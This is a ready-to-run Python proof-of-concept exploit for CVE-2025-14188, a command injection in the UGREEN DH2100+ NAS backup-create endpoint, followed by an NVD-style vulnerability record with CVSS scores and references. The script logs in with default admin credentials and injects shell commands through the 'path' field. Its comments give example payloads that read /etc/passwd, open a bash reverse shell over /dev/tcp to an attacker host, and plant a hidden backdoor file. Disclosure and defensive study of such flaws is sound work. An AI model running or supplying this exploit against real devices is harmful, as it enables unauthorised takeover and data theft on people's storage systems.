CVE-2025-14188

# CVE-2025-14188 PoC - UGREEN DH2100+ Command Injection # Target: UGREEN DH2100+ NAS (firmware <= 5.3.0.251125) # Endpoint: POST /v1/file/backup/create # Parameter: path (vulnerable to command injection) import requests import sys TARGET = "http://target-ugreen-nas.local" USERNAME = "admin" PASSWORD = "admin" def exploit(target, cmd): """Execute command injection via backup create endpoint""" session = requests.Session() # Login to obtain session login_data = {"username": USERNAME, "password": PASSWORD} session.post(f"{target}/api/v1/user/login", json=login_data) # Malicious payload with command injection # Using semicolon to chain commands payload = f";{cmd};" exploit_data = { "path": payload, "backup_type": "full" } response = session.post( f"{target}/v1/file/backup/create", json=exploit_data ) return response.text if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: python cve-2025-14188.py <target> <command>") print("Example: python cve-2025-14188.py http://192.168.1.100 'id'") sys.exit(1) target = sys.argv[1] command = sys.argv[2] result = exploit(target, command) print(f"Response: {result}") # Example exploitation: # 1. Read passwd file: python cve-2025-14188.py http://target ';cat /etc/passwd;' # 2. Reverse shell: python cve-2025-14188.py http://target ';bash -i >& /dev/tcp/attacker/port 0>&1;' # 3. Create backdoor: python cve-2025-14188.py http://target ';echo "backdoor" > /tmp/.hidden;'

{"cve": {"id": "CVE-2025-14188", "sourceIdentifier": "[email protected]", "published": "2025-12-07T11:15:47.557", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in UGREEN DH2100+ up to 5.3.0.251125. This impacts the function handler_file_backup_create of the file /v1/file/backup/create of the component nas_svr. The manipulation of the argument path leads to command injection. The attack is possible to be carried out remotely. The exploit has been disclosed publicly and may be used. Upgrading the affected component is advised."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:C/I:C/A:C", "baseScore": 8.3, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 6.4, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-77"}]}], "references": [{"url": "https://vuldb.com/?ctiid.334608", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.334608", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.698833", "source": "[email protected]"}, {"url": "https://www.notion.so/25e2b76e8e0c80578014fff04a950576", "source": "[email protected]"}]}}